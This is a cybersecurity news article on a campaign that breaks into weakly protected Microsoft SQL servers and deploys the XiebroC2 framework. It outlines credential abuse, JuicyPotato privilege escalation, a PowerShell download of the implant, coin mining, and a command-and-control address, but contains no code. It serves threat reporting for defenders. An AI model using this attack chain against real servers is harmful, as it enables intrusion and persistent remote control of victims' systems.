A sophisticated attack campaign targeting improperly managed Microsoft SQL servers has emerged, deploying the XiebroC2 command and control framework to establish persistent access to compromised systems.
The attack leverages vulnerable credentials on publicly accessible database servers, allowing threat actors to gain initial foothold and escalate privileges through a multi-stage deployment process.
XiebroC2, a publicly available C2 framework similar to CobaltStrike, provides attackers with comprehensive remote control capabilities including information gathering, defense evasion, and system manipulation.
The campaign follows a predictable pattern observed in MS-SQL server attacks, beginning with credential-based intrusions and progressing to coin mining operations.
However, the integration of XiebroC2 represents a significant escalation in attack sophistication, as the framework supports cross-platform operations across Windows, Linux, and macOS environments.
The framework’s open-source nature and extensive feature set make it an attractive alternative to commercial penetration testing tools, offering attackers capabilities such as reverse shells, file management, process control, and network monitoring without the associated costs.
ASEC analysts identified the malware during routine monitoring of attacks targeting MS-SQL servers, confirming the deployment of XiebroC2 alongside traditional coin mining payloads.
The framework’s implant component, written in Go programming language, demonstrates advanced techniques for evading detection while maintaining persistent communication with command and control infrastructure.
.webp)
The attack methodology highlights the ongoing vulnerability of database servers that lack proper security hardening and access controls.
Privilege Escalation Through JuicyPotato Exploitation
The attack chain demonstrates a methodical approach to privilege escalation through the deployment of JuicyPotato, a well-documented exploit tool that abuses Windows token privileges.
Following successful authentication to the target MS-SQL server, attackers encounter the inherent limitation of service account privileges, which typically operate with restricted access rights by design.
To overcome this constraint, the threat actors utilize JuicyPotato to exploit specific token privileges within the currently running process account, effectively elevating their access from service-level to administrative permissions.
The privilege escalation technique capitalizes on the impersonation privileges often granted to service accounts, allowing the exploit to abuse these permissions and spawn processes with elevated rights.
Once JuicyPotato successfully escalates privileges, attackers proceed to download and execute the XiebroC2 framework using PowerShell commands.
This approach ensures that subsequent malicious activities operate with sufficient privileges to modify system configurations, install additional payloads, and establish persistent backdoors.
.webp)
The configuration data reveals the framework’s ability to collect comprehensive system information including process identifiers, hardware identifiers, working directories, and user credentials before establishing encrypted communication channels with the command and control server located at IP address 1.94.185.235 on port 8433.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
